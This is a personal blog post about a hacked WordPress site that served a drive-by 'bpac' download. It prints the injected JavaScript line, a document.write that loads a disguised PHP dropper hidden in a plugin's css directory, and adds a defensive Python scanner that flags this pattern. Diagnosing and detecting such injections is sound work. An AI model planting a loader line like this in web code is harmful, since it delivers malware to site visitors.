November 13th, 2010

So my site was hacked a while ago — it took a while to figure out how, because it was sneaky, and I was busy hunting bears in the outback.

Mildly interesting details follow.

I’m not sure how the code got on my site — suffice it to say, it got write privileges. Somebody probably sneezed on my Facebook page.

Anyway, here is how the thing manifested: the first time on any given day that I would visit any live page on this site, Google Chrome (my browser of choice) would ask me how I wanted to open a file with a name like “bpac.a” — and because Windows decided it was a RealAudio file, and that I should naturally play it with Windows Media Player (which I don’t have installed), the WMP install process would automatically begin.

I don’t know what was in the file; I never saved it or tried to open it, preferring instead to GET IT OFF GET IT OFF GET IT OFF.

I heard later from a visitor that it was a clip of an American football game. Clearly the work of communists.

The source code of the page in question looked completely normal. No weird <script> insertions, no <iframe>s, nothing out of the ordinary.

I finally found it, inserted at the top of one of my own JavaScript includes:

document.write('<script type="text/javascript" src="/wordpress/wp-includes/js/tinymce/plugins/spellchecker/css/jqdialog.min.php"></script>');

The injected line loaded a PHP file buried in a legitimate plugin’s directory tree inside my WordPress installation, with a name (jqdialog.min.php, sitting in a css directory) chosen to blend in with the minified JavaScript and stylesheets around it. The PHP file was the usual 100 solid lines of obfuscated code in the service of sports and other tools of the Devil.
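Two checks that would have caught this particular pattern, written here as an added example (not code from the original post or from WordPress): scan every JavaScript include for a document.write() that emits a script tag pointing at a .php file, and list any .php files sitting in css/ or js/ directories, where only static assets belong. The sample tree, file contents and the theme path wp-content/themes/mytheme/ are constructed for the demo; only the path of the injected file is taken from the post.

```python
"""Added example: detect a document.write()'d <script> tag that loads PHP, and
PHP files hiding in asset directories. Sample tree below is constructed."""
import os
import re
import tempfile
from pathlib import Path

# document.write( '...' ) or document.write( "..." ) with a literal string argument.
DOC_WRITE = re.compile(r"""document\.write\s*\(\s*(['"])(.*?)\1\s*\)""",
                       re.IGNORECASE | re.DOTALL)
# <script ... src="..."> inside the written payload.
SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*(['"])(.*?)\1""",
                        re.IGNORECASE)
# Directory names that should hold static assets only, never executable PHP.
ASSET_DIRS = {"css", "js", "images", "img", "fonts"}


def injected_php_sources(js_text):
    """Return src values of <script> tags emitted via document.write whose path
    (query string and fragment stripped) ends in .php.
    Caveat: only literal string arguments are inspected; payloads assembled with
    unescape(), String.fromCharCode() or concatenation must be decoded first."""
    hits = []
    for m in DOC_WRITE.finditer(js_text):
        for s in SCRIPT_SRC.finditer(m.group(2)):
            src = s.group(2)
            path = src.split("?", 1)[0].split("#", 1)[0]
            if path.lower().endswith(".php"):
                hits.append(src)
    return hits


def php_in_asset_dirs(root):
    """Return sorted POSIX-style paths (relative to root) of *.php files whose
    directory chain contains one of ASSET_DIRS."""
    root = Path(root)
    found = []
    for dirpath, _dirs, files in os.walk(root):
        rel = Path(dirpath).relative_to(root)
        if not ASSET_DIRS.intersection(rel.parts):
            continue
        for name in files:
            if name.lower().endswith(".php"):
                found.append((rel / name).as_posix())
    return sorted(found)


def scan_js_includes(root):
    """Run injected_php_sources over every .js file under root.
    Returns {relative js path: [suspicious src, ...]} for files with hits."""
    root = Path(root)
    report = {}
    for js in root.rglob("*.js"):
        hits = injected_php_sources(js.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[js.relative_to(root).as_posix()] = hits
    return report


# --- constructed sample tree (theme path and file bodies are made up) --------
INJECTED_SRC = "/wordpress/wp-includes/js/tinymce/plugins/spellchecker/css/jqdialog.min.php"
SAMPLE_FILES = {
    # the site's own include with the injected line prepended
    "wp-content/themes/mytheme/js/site.js":
        "document.write('<script type=\"text/javascript\" src=\"" + INJECTED_SRC
        + "\"></script>');\nfunction init() { /* legitimate theme code */ }\n",
    # a clean include that also uses document.write, but loads a .js file
    "wp-content/themes/mytheme/js/widgets.js":
        "document.write('<script src=\"/wordpress/wp-includes/js/jquery/jquery.js\"></script>');\n",
    # the dropper, hiding in a css/ directory under a legitimate plugin
    "wp-includes/js/tinymce/plugins/spellchecker/css/jqdialog.min.php":
        "<?php /* obfuscated payload would be here */ ?>\n",
    "wp-includes/js/tinymce/plugins/spellchecker/css/content.css": "body{}\n",
    # real PHP where PHP belongs: must not be flagged
    "wp-content/plugins/akismet/akismet.php": "<?php // plugin entry point\n",
}


def demo():
    """Write the sample tree to a temp dir and return both reports."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            p = Path(tmp, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body, encoding="utf-8")
        return {"js": scan_js_includes(tmp), "php": php_in_asset_dirs(tmp)}


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Point scan_js_includes() and php_in_asset_dirs() at the document root of a real install to use them for something other than the demo. A hit from the first check is close to conclusive; a hit from the second deserves a look at the file before deleting it, since a few themes and plugins do ship PHP under js/ or css/ on purpose.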

I haven’t seen anything else about this online, so here you go, Internet. You can thank me later.

The “bpac” trojan series is apparently a documented Java exploit.